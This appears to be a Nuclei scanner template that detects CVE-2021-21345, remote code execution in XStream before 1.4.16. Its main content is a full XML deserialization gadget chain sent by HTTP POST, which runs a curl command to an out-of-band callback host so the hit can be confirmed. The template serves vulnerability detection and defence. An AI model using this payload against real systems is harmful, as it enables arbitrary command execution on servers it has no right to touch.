103 lines
4.5 KiB
YAML
103 lines
4.5 KiB
YAML
id: CVE-2021-21345
|
|
|
|
info:
|
|
name: XStream <1.4.16 - Remote Code Execution
|
|
author: pwnhxl,vicrack
|
|
severity: critical
|
|
description: |
|
|
XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
|
|
reference:
|
|
- https://x-stream.github.io/CVE-2021-21345.html
|
|
- http://x-stream.github.io/changes.html#1.4.16
|
|
- https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21345
|
|
remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 9.9
|
|
cve-id: CVE-2021-21345
|
|
cwe-id: CWE-78
|
|
epss-score: 0.46618
|
|
tags: cve,cve2021,xstream,deserialization,rce,oast
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<java.util.PriorityQueue serialization='custom'>
|
|
<unserializable-parents/>
|
|
<java.util.PriorityQueue>
|
|
<default>
|
|
<size>2</size>
|
|
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
|
|
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
|
|
<packet>
|
|
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
|
|
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
|
|
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
|
|
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
|
|
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
|
|
<jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
|
|
<uriProperties/>
|
|
<attributeProperties/>
|
|
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
|
|
<getter>
|
|
<class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
|
|
<name>verify</name>
|
|
<parameter-types/>
|
|
</getter>
|
|
</inheritedAttWildcard>
|
|
</bi>
|
|
<tagName/>
|
|
<context>
|
|
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
|
|
<outer-class reference='../..'/>
|
|
</marshallerPool>
|
|
<nameList>
|
|
<nsUriCannotBeDefaulted>
|
|
<boolean>true</boolean>
|
|
</nsUriCannotBeDefaulted>
|
|
<namespaceURIs>
|
|
<string>1</string>
|
|
</namespaceURIs>
|
|
<localNames>
|
|
<string>UTF-8</string>
|
|
</localNames>
|
|
</nameList>
|
|
</context>
|
|
</bridge>
|
|
</bridge>
|
|
<jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
|
|
<activationCmd>curl http://{{interactsh-url}}</activationCmd>
|
|
</jaxbObject>
|
|
</dataSource>
|
|
</message>
|
|
<satellites/>
|
|
<invocationProperties/>
|
|
</packet>
|
|
</indexMap>
|
|
</comparator>
|
|
</default>
|
|
<int>3</int>
|
|
<string>javax.xml.ws.binding.attachments.inbound</string>
|
|
<string>javax.xml.ws.binding.attachments.inbound</string>
|
|
</java.util.PriorityQueue>
|
|
</java.util.PriorityQueue>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: curl"
|